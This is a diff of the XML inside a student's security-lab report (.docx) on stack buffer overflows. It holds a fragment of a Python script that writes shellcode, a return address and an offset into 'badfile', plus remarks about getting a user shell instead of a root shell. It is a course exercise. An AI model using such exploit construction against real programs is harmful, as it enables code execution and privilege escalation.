+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>content[start:start + len(shellcode)] = shellcode</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># Decide the return address value </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t># and put it somewhere in the payload</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ret    = 0xffffcaa8 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>+ 13</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        # Change this number </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">offset = 132              # Change this number </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>L = 4     # Use 4 for 32-bit address and 8 for 64-bit address</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">content[offset:offset + L] = (ret).to_bytes(L,byteorder='little') </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>################################################################</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t># Write the content to a file</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>with open('badfile', 'wb') as f:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="clear" w:pos="709"/>
+          <w:tab w:val="left" w:pos="750" w:leader="none"/>
+        </w:tabs>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>f.write(content)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>O</w:t>
+      </w:r>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="10">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="1437005"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="9" name="Image9" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="9" name="Image9" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="1437005"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>servations:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="clear" w:pos="709"/>
+          <w:tab w:val="left" w:pos="750" w:leader="none"/>
+        </w:tabs>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:end="0" w:hanging="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -3254,11 +4409,133 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2">
     <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="3"/>
   </w:num>
 </w:numbering>
 </file>
@@ -3270,6 +4547,7 @@
       <w:rPr>
         <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
         <w:kern w:val="2"/>
+        <w:sz w:val="20"/>
         <w:szCs w:val="24"/>
         <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
       </w:rPr>

--- a/Lab03/AustinDecker_CS445_Lab03-Report.docx
+++ b/Lab03/AustinDecker_CS445_Lab03-Report.docx
@@ -95,7 +95,7 @@
         <w:pStyle w:val="Heading1"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
+          <w:numId w:val="5"/>
         </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="both"/>
@@ -193,7 +193,7 @@
         <w:pStyle w:val="Heading1"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
+          <w:numId w:val="5"/>
         </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="start"/>
@@ -1205,7 +1205,7 @@
         <w:pStyle w:val="Heading10"/>
         <w:numPr>
           <w:ilvl w:val="8"/>
-          <w:numId w:val="3"/>
+          <w:numId w:val="5"/>
         </w:numPr>
         <w:bidi w:val="0"/>
         <w:spacing w:lineRule="auto" w:line="240"/>
@@ -1242,7 +1242,7 @@
         <w:pStyle w:val="Heading3"/>
         <w:numPr>
           <w:ilvl w:val="2"/>
-          <w:numId w:val="3"/>
+          <w:numId w:val="5"/>
         </w:numPr>
         <w:bidi w:val="0"/>
         <w:spacing w:lineRule="auto" w:line="240"/>
@@ -1305,7 +1305,16 @@
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
-        <w:t>When I ran the compiled program, I noticed that the program successfully gave me a root shell, as shown in the below screenshot.</w:t>
+        <w:t xml:space="preserve">When I ran the compiled program, I noticed that the program successfully gave me a shell, as shown in the below screenshot. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>Since the program was not a setuid program, I do not get the root shell, but the user shell instead.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1313,7 +1322,7 @@
         <w:pStyle w:val="Heading1"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
+          <w:numId w:val="5"/>
         </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="both"/>
@@ -2683,7 +2692,7 @@
         <w:pStyle w:val="Heading1"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="4"/>
         </w:numPr>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -2938,20 +2947,26 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+        <w:rPr>
